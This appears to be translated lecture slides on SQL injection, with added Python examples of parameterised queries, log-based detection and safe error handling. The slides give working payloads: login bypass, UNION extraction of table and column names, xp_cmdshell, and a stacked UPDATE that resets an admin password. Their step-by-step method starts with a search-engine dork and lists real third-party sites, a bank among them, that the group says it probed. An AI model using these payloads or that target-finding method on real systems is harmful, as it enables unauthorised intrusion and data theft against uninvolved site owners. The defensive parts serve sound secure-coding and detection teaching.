
SQL INJECTION

Contents:


What is SQL Injection?
Types of SQL Injection attacks
SQL injection attack techniques
Prevention
Demo

What is SQL Injection?
SQL injection is an attack technique that exploits weaknesses in the input validation of web applications, together with the error messages of the database management system, to "inject" and execute illegitimate SQL statements.
Its consequences are severe: it lets attackers delete and modify data, since they gain full control over the application's database and even over the server the application runs on.
This flaw usually occurs in web applications whose data is managed by a database management system such as SQL Server, MySQL, Oracle, DB2 or Sybase.
Types of SQL Injection attacks
There are four common forms:
Bypassing the login check (authorization bypass)
Using the SELECT statement
Using the INSERT statement
Using stored procedures [2], [3]
Attack form: bypassing the login check
Logging in by exploiting a flaw in the SQL statements that operate on the web application's database.
In this case two pages may be used: an HTML page that displays the input form and an ASP page that processes what the user entered. For example:
login.htm

<form action="ExecLogin.asp" method="post">
Username: <input type="text" name="fUSRNAME"><br>
Password: <input type="password" name="fPASSWORD"><br>
<input type="submit">
</form>
execlogin.asp
<%
Dim vUsrName, vPassword, objRS, strSQL
vUsrName = Request.Form("fUSRNAME")
vPassword = Request.Form("fPASSWORD")
' User input is concatenated straight into the SQL text (the flaw this slide illustrates)
strSQL = "SELECT * FROM T_USERS " & _
    "WHERE USR_NAME='" & vUsrName & _
    "' and USR_PASSWORD='" & vPassword & "'"
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."
If (objRS.EOF) Then
    Response.Write "Invalid login."
Else
    Response.Write "You are logged in as " & objRS("USR_NAME")
End If
Set objRS = Nothing
%>
The user enters the following string in both the username and password fields of login.htm: ' OR ''='
The query that is sent for execution then becomes:
SELECT * FROM T_USERS WHERE USR_NAME='' OR ''='' and USR_PASSWORD='' OR ''=''
This query is valid and returns every record of T_USERS, and the code that follows treats this illegitimate user as a legitimately logged-in user.
Attack form: using the SELECT statement
To carry out this kind of attack, the attacker must be able to understand and exploit the information leaked in the system's error messages in order to find the weak points from which the attack starts.
Typically there is a page that receives the ID of the news item to display and then queries the content of the item with that ID.
<%
Dim vNewsID, objRS, strSQL
vNewsID = Request("ID")
' The ID is used unquoted and unvalidated in a numeric comparison
strSQL = "SELECT * FROM T_NEWS WHERE NEWS_ID=" & vNewsID
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."
Set objRS = Nothing
%>
If the ID is given the value 0 or 1=1, the SQL query returns every article from the table, because the statement executed is:
SELECT * FROM T_NEWS WHERE NEWS_ID=0 or 1=1
Another input of the same kind is:
' UNION SELECT ALL SELECT OtherField FROM OtherTable WHERE ''=' (*)
In this case, besides the first query, which fails, the program also executes the statement that follows the UNION keyword.
If we append ' UNION SELECT name FROM sysobjects WHERE xtype = 'U', the names of all tables in the database can be listed.
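The login bypass (the ' OR ''=' string) and the unvalidated numeric news ID from the two sections above, reproduced as an added example in Python against an in-memory SQLite database. This is not code from the slides: the table and column names follow the slides, while the sample rows, the function names and the hardened variants are assumptions of this example. Each concatenated query is placed next to its parameterised form, and the seed rows are inserted with bound parameters, which is also the fix for the INSERT form described below.

```python
"""Added example (not from the slides): the login and news-ID queries built by
string concatenation versus with bound parameters, run against SQLite."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a throwaway in-memory database with constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE T_USERS (USR_NAME TEXT, USR_PASSWORD TEXT)")
    con.execute("CREATE TABLE T_NEWS (NEWS_ID INTEGER, TITLE TEXT)")
    # Parameterised INSERTs: the same fix applies to the INSERT form of the attack.
    con.executemany("INSERT INTO T_USERS VALUES (?, ?)",
                    [("alice", "s3cret"), ("bob", "hunter2")])
    con.executemany("INSERT INTO T_NEWS VALUES (?, ?)",
                    [(1, "First post"), (2, "Second post"), (3, "Third post")])
    return con


def login_vulnerable(con, user: str, password: str) -> list:
    """Mirrors execlogin.asp: untrusted input is spliced into the SQL text."""
    sql = ("SELECT USR_NAME FROM T_USERS WHERE USR_NAME='" + user +
           "' and USR_PASSWORD='" + password + "'")
    return [row[0] for row in con.execute(sql)]


def login_safe(con, user: str, password: str) -> list:
    """Bound parameters: values travel separately from the SQL text, so a
    quote in the input can never terminate the string literal."""
    sql = "SELECT USR_NAME FROM T_USERS WHERE USR_NAME=? and USR_PASSWORD=?"
    return [row[0] for row in con.execute(sql, (user, password))]


def news_vulnerable(con, news_id: str) -> list:
    """Mirrors the news page: a numeric context, so no quote is needed at all
    and quote-escaping alone would not help."""
    sql = "SELECT NEWS_ID FROM T_NEWS WHERE NEWS_ID=" + news_id
    return [row[0] for row in con.execute(sql)]


def news_safe(con, news_id: str) -> list:
    """Allow-list the type first (digits only), then bind the value."""
    if not news_id.isdigit():
        raise ValueError("NEWS_ID must be a non-negative integer")
    sql = "SELECT NEWS_ID FROM T_NEWS WHERE NEWS_ID=?"
    return [row[0] for row in con.execute(sql, (int(news_id),))]


PAYLOAD = "' OR ''='"   # the bypass string from the slides

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, PAYLOAD, PAYLOAD))   # every user is returned
    print(login_safe(db, PAYLOAD, PAYLOAD))         # []
    print(news_vulnerable(db, "0 or 1=1"))          # every article is returned
    try:
        news_safe(db, "0 or 1=1")
    except ValueError as exc:
        print("rejected:", exc)
```

The two safe variants show the two halves of the fix: a parameter placeholder for every value that reaches the database, and an allow-list check of the type before that for values that the query treats as numbers.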
Attack form: using the INSERT statement
An essential feature is that, after registering successfully, users can view and edit their own information. SQL injection can be used here when the system does not validate the information entered.
For example, an INSERT statement has the syntax INSERT INTO TableName VALUES('Value One', 'Value Two', 'Value Three'). If the code that builds the SQL statement has the form:
<%
' Each value is concatenated into the statement without validation or escaping
strSQL = "INSERT INTO TableName VALUES('" & strValueOne & "', '" & _
    strValueTwo & "', '" & strValueThree & "')"
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."
Set objRS = Nothing
%>
Attack form: using stored procedures
Attacks through stored procedures cause very serious damage if the application runs with the system administrator privilege 'sa'.
For example, if the injected code is instead of the form: ' ; EXEC xp_cmdshell 'cmd.exe dir C: '
the system then executes a directory listing of the C:\ drive on which the server is installed. What kind of damage is done depends on the command placed after cmd.exe.
SQL injection attack techniques
Step 1: Find a target.
Step 2: Check the web page for weak spots.
Step 3: Obtain data from the database using ODBC error messages.
Step 4: Determine the names of the columns in the table.
Step 5: Collect the important data.
Step 6: Process the findings.

Finding a target
You can use any search engine on the Internet to look for login, search or feedback pages.
You can customize the search engine query to fit your needs.

Run the search query:
inurl:php?id= site:com.vn

These are the results obtained.
Results found by the group
http://www.vsmc.com.vn/news_detail.php?id=19'
http://www.toeic.com.vn/info/details.php?id=383'
http://www.phanhoadigi.com.vn/list_product.php?ID=1173&namecate=EOS'
http://forum.key.com.vn/viewtopic.php?id=362
http://www.biconsi.com.vn/index.php?id=36'
http://www.vietphone.com.vn/download.php?mode=download&id=19'
http://thammyvienthanhbinh.com.vn/detail.php?id=19'
http://www.voip.com.vn/download.php?mode=download&id=28'

http://bidv.com.vn/advert.asp?id=36'
http://www.licogi.com.vn/home.asp?ID=234&Langid=2%27
http://www.galilcol.ac.il/page.asp?id=17
Note: not every page can be attacked.
Checking the web page for weak spots
You can append some commands to the URL, or enter them in the login or search forms, to trigger and detect errors.
Here are some of the ways our group added input and detected errors:
Obtaining data from the database using ODBC error messages
This is the most important step and requires both technique and an understanding of databases.
The table INFORMATION_SCHEMA.COLUMNS contains the names of all columns in the tables. It can be exploited as follows:
http://vitcon/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5
Collecting the important data
We must determine the names of the important tables and columns.
We can get the first login_name in the admin_login table as follows:
http://vitcon/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login

You can easily see that the first admin user has the login_name aaa.
Then use the user name found to look for the password:
http://vitcon/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login WHERE login_name='aaa'
Now you receive aaa's password, which is bbb.

Processing the findings
Once you have the names of all the columns in the table, you can UPDATE or INSERT a new record into it.
To change aaa's password you can do the following:
http://vitcon/index.asp?id=10 ;UPDATE admin_login SET password='ccc' WHERE login_name='aaa'
Or you log in directly and act with that user's privileges.
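Every step of the technique just described leaves a trace in the web server's access log: the quote probe, the UNION with INFORMATION_SCHEMA or sysobjects, and the stacked UPDATE. The following added example (not part of the slides) scans constructed access-log lines for those constructs. The log lines, the hostnames and paths inside them, and the rule set are assumptions of this example; nothing here comes from a real server.

```python
"""Added example (not from the slides): flagging access-log requests that carry
the probe and extraction patterns described in the technique steps."""
import re
from urllib.parse import unquote_plus

# Matches the request part of a combined/common log line and the status code.
LOG_LINE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/[\d.]+"\s+(\d{3})')

# Rules are applied to the URL-decoded request. They are limited to the
# constructs the slides show; a production ruleset would be broader.
RULES = [
    ("tautology",      re.compile(r"\bor\s+['\w]*\s*=\s*['\w]*", re.I)),   # or 1=1, OR ''=''
    ("union_select",   re.compile(r"\bunion\b[\s\w]*\bselect\b", re.I)),
    ("schema_enum",    re.compile(r"information_schema|\bsysobjects\b", re.I)),
    ("stacked_write",  re.compile(r";\s*(?:update|insert|delete|exec)\b", re.I)),
    ("xp_cmdshell",    re.compile(r"xp_cmdshell", re.I)),
    ("quote_in_value", re.compile(r"=[^&]*'")),                            # weak on its own
]
WEAK = {"quote_in_value"}   # a lone quote also appears in legitimate input (O'Brien)


def scan_line(line: str) -> list:
    """Return the names of the rules that match one access-log line."""
    m = LOG_LINE.search(line)
    if not m:
        return []
    request = unquote_plus(m.group(1))   # %27 -> ' and + -> space before matching
    return [name for name, rx in RULES if rx.search(request)]


def scan_log(lines) -> list:
    """Return (line_number, status, matched_rules) for every line that matches."""
    hits = []
    for n, line in enumerate(lines, 1):
        rules = scan_line(line)
        if rules:
            hits.append((n, LOG_LINE.search(line).group(2), rules))
    return hits


def triage(hits) -> list:
    """Keep a hit when a strong rule fired, or when the weak quote probe
    produced a server error (status 500), the signal the ODBC step relies on."""
    return [h for h in hits if (set(h[2]) - WEAK) or h[1] == "500"]


# Constructed sample log; 10.0.0.x addresses and the paths are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0700] "GET /news_detail.php?id=19 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0700] "GET /news_detail.php?id=19%27 HTTP/1.1" 500 812',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0700] "GET /index.asp?id=10+UNION+SELECT+TOP+1+COLUMN_NAME'
    '+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=%27admin_login%27-- HTTP/1.1" 500 940',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0700] "GET /index.asp?id=10;UPDATE+admin_login+SET+password'
    '=%27ccc%27+WHERE+login_name=%27aaa%27 HTTP/1.1" 200 700',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0700] "GET /search.php?q=O%27Brien HTTP/1.1" 200 3000',
]

if __name__ == "__main__":
    for n, status, rules in triage(scan_log(SAMPLE_LOG)):
        print(f"line {n}: status {status}, rules {rules}")
```

Decoding before matching matters because the probes in the slides arrive as %27 rather than a literal quote, and the triage step shows why a single-quote rule should be correlated with the response status or other rules rather than alerting on its own.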
Prevention
There must be a strict control mechanism that limits the data-processing privileges of the user account the web application uses.
Ordinary applications should avoid running under privileges such as dbo or sa. The more restricted the privileges, the smaller the damage.
Remove any technical information from the message returned to the user when the application encounters an error.
Ordinary error messages reveal specific technical details that can let an attacker learn the system's weak points.
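The second prevention point, keeping database error text out of the response, is shown here as an added example in Python (not code from the slides). A leaky handler that echoes the driver's message is placed beside a hardened one that validates the ID, binds it, and on failure returns only a generic message with a reference number while the full error goes to the server log. The table, the in-memory logging handler and the function names are assumptions of this example.

```python
"""Added example (not from the slides): generic client error messages with the
detail kept server-side, so the ODBC-style diagnostics never reach the browser."""
import logging
import sqlite3
import uuid


class ListHandler(logging.Handler):
    """Collects log records in memory so they can be inspected here;
    a deployment would use a file or SIEM handler instead."""
    def __init__(self):
        super().__init__()
        self.records = []

    def emit(self, record):
        self.records.append(self.format(record))


LOG = logging.getLogger("app.db")
LOG.setLevel(logging.ERROR)
LOG.propagate = False
HANDLER = ListHandler()
LOG.addHandler(HANDLER)


def make_db() -> sqlite3.Connection:
    """Constructed sample table for the demonstration."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE T_NEWS (NEWS_ID INTEGER, TITLE TEXT)")
    con.execute("INSERT INTO T_NEWS VALUES (?, ?)", (10, "Sample"))
    return con


def make_broken_db() -> sqlite3.Connection:
    """A connection without the table, to simulate an internal database fault."""
    return sqlite3.connect(":memory:")


def show_news_leaky(con, news_id: str) -> str:
    """Anti-pattern: SQL built by concatenation and the driver's error text
    echoed to the client, exactly what the ODBC error-message step relies on."""
    try:
        row = con.execute("SELECT TITLE FROM T_NEWS WHERE NEWS_ID=" + news_id).fetchone()
    except sqlite3.Error as exc:
        return "Database error: " + str(exc)
    return row[0] if row else "Not found."


def show_news_hardened(con, news_id: str) -> str:
    """Validated input, bound parameter, generic message to the client and
    the full detail in the server log under a reference number."""
    if not news_id.isdigit():
        return "Invalid request."          # rejected before touching the database
    try:
        row = con.execute("SELECT TITLE FROM T_NEWS WHERE NEWS_ID=?",
                          (int(news_id),)).fetchone()
    except sqlite3.Error as exc:
        incident = uuid.uuid4().hex[:8]
        LOG.error("incident=%s query failed for id=%r: %s", incident, news_id, exc)
        return f"An internal error occurred (reference {incident})."
    return row[0] if row else "Not found."


if __name__ == "__main__":
    db = make_db()
    print(show_news_leaky(db, "10 UNION SELECT TOP 1 x FROM y"))   # leaks the parser error
    print(show_news_hardened(db, "10 UNION SELECT TOP 1 x FROM y"))  # Invalid request.
    print(show_news_hardened(make_broken_db(), "10"))                # generic message
    print(HANDLER.records[-1])                                        # detail is in the log
```

The reference number is what lets an operator find the logged detail for a user's report without the response itself carrying the database's own wording, column names or line numbers.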
DEMO
